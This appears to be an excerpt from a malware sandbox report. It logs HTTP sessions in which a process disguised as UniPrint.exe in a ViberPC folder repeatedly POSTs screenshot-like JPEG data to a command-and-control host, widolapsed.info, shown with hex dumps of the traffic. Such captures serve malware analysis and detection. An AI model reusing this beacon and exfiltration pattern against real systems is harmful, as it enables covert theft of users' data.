                                                                                                      Content-Type: multipart/form-data; boundary=--------4043093276
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:32 UTC554OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 30 34 33 30 39 33 32 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4043093276Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:32 UTC555OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 94 bd 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:45:32 UTC555OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:32 UTC571OUTData Raw: 48 41 c3 4a dd 07 d3 d6 a9 59 5b 35 dd e4 36 ea 70 64 60 b9 f4 1d cd 77 36 fa 91 95 5a cb 44 44 8e d2 d5 31 25 d3 8c 85 c7 5c 0e e6 bb 31 15 65 05 68 6f f9 1c 38 7a 51 9b bc f6 fc ca 6b e0 64 db f3 5f b6 ef 68 f8 fe 75 91 ac 78 62 f3 4d 8c cc a4 4f 00 ea ca 30 57 ea 2a 33 e2 5d 59 6e 0b a5 e3 95 07 80 c0 72 3d c6 2b bf d3 2e c6 a3 a5 c3 72 c8 07 9a 9f 32 f6 cf 43 5c b5 2a 62 28 5a 53 77 47 55 3a 78 7a f7 8c 15 99 e5 15 9f ac ff 00 c7 a2 7f d7 41 fc 8d 74 5e 21 b0 1a 76 b1 34 08 31 19 f9 d3 e8 7b 7f 31 5c ee b3 ff 00 1e 89 ff 00 5d 07 f2 35 d9 52 4a 54 9c 97 54 71 d3 8b 8d 65 17 d1 98 b4 51 45 79 87 aa 14 51 49 40 1e f5 2c 01 fe 64 e1 bf 9d 40 32 0e 0f 51 57 0d 53 63 fb d7 ff 00 78 d7 cb d4 4b 73 d7 8b 24 53 5e 31 af 7f c8 c1 a9 7f d7 d4 bf fa 19 af 66 53
                                                                                                      Data Ascii: HAJY[56pd`w6ZDD1%\1eho8zQkd_huxbMO0W*3]Ynr=+.r2C\*b(ZSwGU:xzAt^!v41{1\]5RJTTqeQEyQI@,d@2QWScxKs$S^1fS
                                                                                                      2021-09-15 11:45:32 UTC587OUTData Raw: 49 4b 4c 4c 29 69 28 a0 05 a2 8a 28 01 68 a4 14 b4 c4 c5 a2 92 96 98 85 a2 92 8a 00 70 a5 14 94 b4 d0 98 b4 b4 94 b4 c9 0a 5a 41 4b 4c 42 d2 8a 6d 2d 34 26 2d 3a 9a 29 d4 c4 c2 96 92 96 a8 41 4a 29 29 45 02 17 34 b4 da 51 40 0b 4b 49 4b 54 48 b4 b4 94 53 42 16 8a 28 a6 03 96 9d 4d 14 a4 d3 44 b1 73 4a 29 14 66 a4 09 eb 54 90 9b 13 14 b8 a7 01 4e e2 aa c4 5c 60 14 f1 c5 14 53 26 e1 4b 49 4b 4c 42 8a 5a 6d 2d 00 14 b9 a6 d2 9a 00 5c d1 9f 4a 6d 2e 0d 00 3b 34 99 a0 0a 70 14 08 40 29 c0 50 05 3a 82 5b 0a 4a 5c 51 8a 62 0a 5a 4a 5a 04 14 e5 a6 d2 d0 03 e8 a6 d3 85 32 45 a2 92 96 81 16 74 ef f8 fe 8b eb 4f bd 3f e9 b2 ff 00 bd 4c d3 bf e3 fa 2f ad 2d d9 cd d4 9f ef 56 1f f2 f4 b7 fc 32 2a 4a 28 ad 4c 45 a2 92 96 80 0a 28 a2 81 0b 45 25 2d 20 0a 28 a2 81 05 2d
                                                                                                      Data Ascii: IKLL)i((hpZAKLBm-4&-:)AJ))E4Q@KIKTHSB(MDsJ)fTN\`S&KIKLBZm-\Jm.;4p@)P:[J\QbZJZ2EtO?L/-V2*J(LE(E%- (-
                                                                                                      2021-09-15 11:45:32 UTC603OUTData Raw: 99 4b 0c fa b4 8c 9c 53 c4 6e 78 0a 4f e1 5a 27 52 d3 e3 ff 00 57 6a 4f d6 90 eb 81 7f d5 5a c6 3e b4 7b 4a 8f 68 87 b0 a6 b7 91 51 6d 27 6e 91 9f ca ad da 69 b7 1e 68 62 87 ad 46 da ed d1 fb a1 17 e8 29 89 aa de 3c 8b 99 4e 09 ec 2a 64 ab 34 69 4d 50 8c 96 ec b9 e3 35 db 0d a8 3e 95 cb e9 ff 00 f2 11 b7 ff 00 ae 8b 5d 37 8c 49 6b 6b 42 7a 95 ae 67 4f ff 00 90 8d bf fd 74 1f ce 96 1f f8 07 5d 6f e3 1e 85 a8 a5 b9 98 34 d2 85 38 e9 54 8c da 6c 7d 5c 9a ad e2 42 45 ea e0 ff 00 0d 62 f5 ef 58 50 a1 cd 04 db 27 13 8c e4 a8 e2 a2 74 07 53 d3 d3 ee 44 4d 30 eb 91 2f fa bb 71 58 54 56 eb 0b 0e a7 23 c7 d5 e8 6c 36 bf 37 f0 46 a2 a0 7d 66 ed ba 36 3e 95 9d 45 52 c3 d3 5d 0c 9e 2e b3 ea 5b 6d 42 e5 fe f4 ad f9 d3 7c e9 1b ab 93 f8 d5 7a 72 d5 fb 38 ad 91 2a b4 de
                                                                                                      Data Ascii: KSnxOZ'RWjOZ>{JhQm'nihbF)<N*d4iMP5>]7IkkBzgOt]o48Tl}\BEbXP'tSDM0/qXTV#l67F}f6>ER].[mB|zr8*
                                                                                                      2021-09-15 11:45:32 UTC619OUTData Raw: e9 69 ff 00 81 4d ff 00 c6 e8 e4 7f d3 41 ce bf a4 cb 94 55 3f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 91 ff 00 4d 07 3a fe 93 2e 51 54 fc cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8e 47 fd 34 1c eb fa 4c b9 45 53 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 79 9a 9f fc fa 5a 7f e0 53 7f f1 ba 39 1f f4 d0 73 af e9 32 e5 15 4f cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 e4 7f d3 41 ce bf a4 cb 94 55 3f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 91 ff 00 4d 07 3a fe 93 2e 51 54 fc cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8e 47 fd 34 1c eb fa 4c b9 45 53 f3 35 3f f9 f4 b4 ff 00 c0
                                                                                                      Data Ascii: iMAU?3SKOo7G7M:.QTO}-?)f>nG4LES5?tyZS9s2OjiMAU?3SKOo7G7M:.QTO}-?)f>nG4LES5?
                                                                                                      2021-09-15 11:45:32 UTC634OUTData Raw: 92 d8 b0 db f6 63 24 fc 0e 71 c9 94 83 d4 67 23 1c 70 05 6e 22 2c 68 a8 8a 15 54 60 28 18 00 7a 52 d1 40 05 7c e3 5f 47 57 ce 34 d0 98 56 c5 cf 8a 35 db 8b a9 67 fe d6 bd 8b cd 76 7f 2e 2b 87 54 4c 9c e1 46 78 03 b0 ac 7a 05 30 34 e5 d7 6f a7 9e 19 ee 64 f3 e6 8a d6 4b 51 24 ac cc cc ae 1c 12 49 39 24 09 0e 3e 82 b3 28 a2 81 05 14 51 40 05 5d d3 2f be c7 31 dc 09 8d fe f6 3b 7b d5 2a 2a e1 37 09 29 47 72 67 05 38 b8 cb 63 7d ff 00 b1 e5 6f 31 8a 64 f2 79 23 f4 ac cd 4a 4b 79 6e 17 ec a0 08 d5 36 f0 b8 e7 26 a9 d1 5a d4 af ce ad ca 91 95 3a 1c 8e fc cd 85 14 51 5c e6 e1 5d 9d 8f 8d 61 8f 46 b5 d3 6e 2c a4 02 dd 40 f3 51 c1 dd 8e 3e e9 c6 3a fa d7 19 45 16 d5 4b b0 a5 1e 68 b8 be a7 7f ff 00 0b 12 df c8 fb 3f f6 4b 6c db b3 cc f3 46 ec 63 19 c6 3a fb 67 f1
                                                                                                      Data Ascii: c$qg#pn",hT`(zR@|_GW4V5gv.+TLFxz04odKQ$I9$>(Q@]/1;{**7)Grg8c}o1dy#JKyn6&Z:Q\]aFn,@Q>:EKh?KlFc:g
                                                                                                      2021-09-15 11:45:32 UTC636OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 30 34 33 30 39 33 32 37 36 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4043093276--
                                                                                                      2021-09-15 11:45:33 UTC636INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:32 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=50121d0d7b920ecf9b06f062985a3e93f1c5decde191e6f62180cd4ffe1ce659; expires=Thu, 15-Sep-2022 11:45:33 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:33 UTC636INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      8192.168.2.34976145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:33 UTC636OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 81257
                                                                                                      Content-Type: multipart/form-data; boundary=--------4228739266
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:33 UTC637OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 32 32 38 37 33 39 32 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4228739266Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:33 UTC637OUTData Raw: 59 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 8d c4 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee ca 9a 10 4e 0f 72 10 20 82 3b 3c 54 aa 1e 5f ee c8 ff 2a 88 63 f3 be db 5f c5 c6 3d 26 b3 58 91 09 97 15 60 fe 43 e5 1b 64 51 4d
                                                                                                      Data Ascii: YiPS4\DB.${Owe0E_J4f,?:M2gA[DNr ;<T_*c_=&X`CdQM
                                                                                                      2021-09-15 11:45:33 UTC637OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:33 UTC653OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:33 UTC669OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:33 UTC685OUTData Raw: 3a 8a a5 87 a6 ba 19 3c 5d 67 d4 b6 da 85 cb fd e9 5b f3 a6 f9 d2 37 57 27 f1 aa f4 e5 ab f6 71 5b 22 55 69 bd d9 2e e2 7a 93 4b 9a 68 a5 a5 62 d4 9b 1d 4e 14 dc d2 e6 91 69 8e cd 38 1a 8e 9e 29 34 52 63 e9 45 34 52 d4 9a 26 3a 9c 29 80 d3 b2 29 14 98 ec d3 85 33 34 b9 35 2d 16 99 25 14 d0 4d 2f d4 d2 68 a4 c7 8a 5c 8a 8f 7a 0e ac 3f 3a 63 5c c0 9d 5c 1a 5c ac 39 d2 ea 59 07 e5 3f 4a e3 3c 51 ff 00 1f b1 7f d7 21 5d 31 d4 a0 5c 81 93 5c cf 89 4e 6e e1 3f f4 c8 7f 3a a8 c5 ad c1 4d 4a 5a 1c 5d 14 56 e5 e1 48 7c 2f a7 18 e5 d3 e3 79 a1 72 f1 bd a8 69 a5 3e 6b 0c 87 d8 71 80 3f bc 3a 57 03 76 b1 eb a5 73 12 94 33 2a b0 56 20 30 c3 00 7a f7 ae ab 54 82 de 4f 14 4d 6a 4d 84 b6 f6 e6 69 05 b5 b5 b7 94 c3 62 16 08 ec 11 73 9c 63 82 7b d5 5b 65 7d 42 3b 49 2e 17
                                                                                                      Data Ascii: :<]g[7W'q["Ui.zKhbNi8)4RcE4R&:))345-%M/h\z?:c\\\9Y?J<Q!]1\\Nn?:MJZ]VH|/yri>kq?:Wvs3*V 0zTOMjMibsc{[e}B;I.
                                                                                                      2021-09-15 11:45:33 UTC701OUTData Raw: 05 37 ff 00 1b a3 cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 c8 ff 00 a6 83 9d 7f 49 97 28 aa 7e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 23 fe 9a 0e 75 fd 26 5c a2 a9 f9 9a 9f fc fa 5a 7f e0 53 7f f1 ba 3c cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1c 8f fa 68 39 d7 f4 99 72 8a a7 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 72 3f e9 a0 e7 5f d2 65 ca 2a 9f 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 c8 ff 00 a6 83 9d 7f 49 97 28 aa 7e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 99 2d dd f4 01 1e 7b 4b 61 1b 48 88 4a 5c 31 23 73 05 ce 0a 0c f5 f5 a7 c8 ff 00 a6 85 ce bf a4 cb f4 51 45 41 61 5e 57 f1 63 fe 43 36 5f f5 c0 ff 00 3a f5 4a f2 bf 8b 1f f2 19
                                                                                                      Data Ascii: 7I(~f>n3SKOo7G#u&\ZS<O}-?)h9rjiM5?tr?_e*7I(~f>n-{KaHJ\1#sQEAa^WcC6_:J
                                                                                                      2021-09-15 11:45:33 UTC716OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 32 32 38 37 33 39 32 36 36 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4228739266--
                                                                                                      2021-09-15 11:45:34 UTC716INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:33 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=45b0cc69e847efa543c144c39fbf12acab4529b7a9a61083f4eb4f5e97d242e0; expires=Thu, 15-Sep-2022 11:45:34 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:34 UTC716INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      9192.168.2.34976245.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:34 UTC716OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 81331
                                                                                                      Content-Type: multipart/form-data; boundary=--------3803026718
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:34 UTC717OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 38 30 33 30 32 36 37 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3803026718Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:34 UTC717OUTData Raw: 59 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 7b c4 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee ca 9a 10 4e 0f 72 10 20 82 3b 3c 54 aa 1e 5f ee c8 ff 2a 88 63 f3 be db 5f c5 c6 3d 26 b3 58 91 09 97 15 60 fe 43 e5 1b 64 51 4d
                                                                                                      Data Ascii: YiPS4\DB.${Owe{0E_J4f,?:M2gA[DNr ;<T_*c_=&X`CdQM
                                                                                                      2021-09-15 11:45:34 UTC717OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:34 UTC733OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:34 UTC749OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
